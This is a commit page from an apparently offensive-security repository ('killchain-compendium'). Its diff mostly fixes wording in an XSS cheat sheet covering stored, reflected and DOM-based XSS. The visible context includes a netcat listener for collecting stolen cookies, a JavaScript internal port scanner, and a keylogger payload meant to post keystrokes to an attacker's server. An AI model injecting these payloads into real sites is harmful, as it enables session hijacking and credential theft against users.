whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

cleanup and some infos

This commit is contained in:
gurkenhabicht 2026-05-24 22:34:33 +02:00
parent 9fe3c7f7cc
commit d61022f4b3
1 changed files with 10 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
Exploits/Web/XSS.md
View File

@ -5,14 +5,16 @@ is possible in Javascript, VBScript, Flash and CSS.
## Stored XSS ## Stored XSS
This is where a malicious string originates from the websites database. Such as The stored XSS persists in the backend of the site after a successful hack.
This is where a malicious string originates from the website's database. Such as
(stored in a db) (stored in a db)
* User profiles * User profiles
* Chats and comments * Chats and comments
* Part of link * Part of link
* Blind xss is stored inside the app but effects are only visible by proxy, [xsshunter](https://xsshunter.com/). Blind xss is stored inside the app, but effects are only visible by proxy,
[xsshunter](https://xsshunter.com/).
### Examples ### Examples
@ -40,7 +42,7 @@ Open nc port and collect cookies
## Reflected XSS ## Reflected XSS
In a reflected cross-site scripting attack, the malicious payload is part of In a reflected cross-site scripting attack, the malicious payload is part of
the victims request to the website. The website includes this payload in the victim's request to the website. The website includes this payload in
response back to the user. To summarise, an attacker needs to trick a victim response back to the user. To summarise, an attacker needs to trick a victim
into clicking a URL to execute their malicious payload. into clicking a URL to execute their malicious payload.
@ -72,8 +74,8 @@ Open netcat binder to catch the http queries
## DOM based XSS ## DOM based XSS
With [DOM-Based With [DOM-Based
XSS](https://portswigger.net/web-security/cross-site-scripting/dom-based), an XSS](https://portswigger.net/web-security/cross-site-scripting/dom-based),
attackers payload will only be executed through the DOM when the an attacker's payload will only be executed through the DOM when the
vulnerable Javascript code is either loaded or interacted with. It goes through vulnerable Javascript code is either loaded or interacted with. It goes through
a Javascript function like so: a Javascript function like so:
@ -164,7 +166,7 @@ By requesting the favicon, checking port 80
let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">' let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
document.body.innerHTML += code document.body.innerHTML += code
} }
</script> </script>
``` ```
[pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js) [pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js)
@ -173,7 +175,7 @@ By requesting the favicon, checking port 80
```javascript ```javascript
<script type="text/javascript"> <script type="text/javascript">
let l = ""; // Variable to store key-strokes in let l = ""; // Variable to store keystrokes in
document.onkeypress = function (e) { // Event to listen for key presses document.onkeypress = function (e) { // Event to listen for key presses
l += e.key; // If user types, log it to the l variable l += e.key; // If user types, log it to the l variable
console.log(l); // update this line to post to your own server console.log(l); // update this line to post to your own server
@ -193,7 +195,7 @@ document.onkeypress = function (e) {
## Tab Nabbing ## Tab Nabbing
* Redirection of source after opening a tab through a provisioned link and back referencing * Redirection of source after opening a tab through a provisioned link and back referencing
* [Hacktricks Tabnabbing](https://book.hacktricks.xyz/pentesting-web/reverse-tab-nabbing) * [Hacktricks Tabnabbing](https://book.hacktricks.xyz/pentesting-web/reverse-tab-nabbing)
## Tricks and Tips ## Tricks and Tips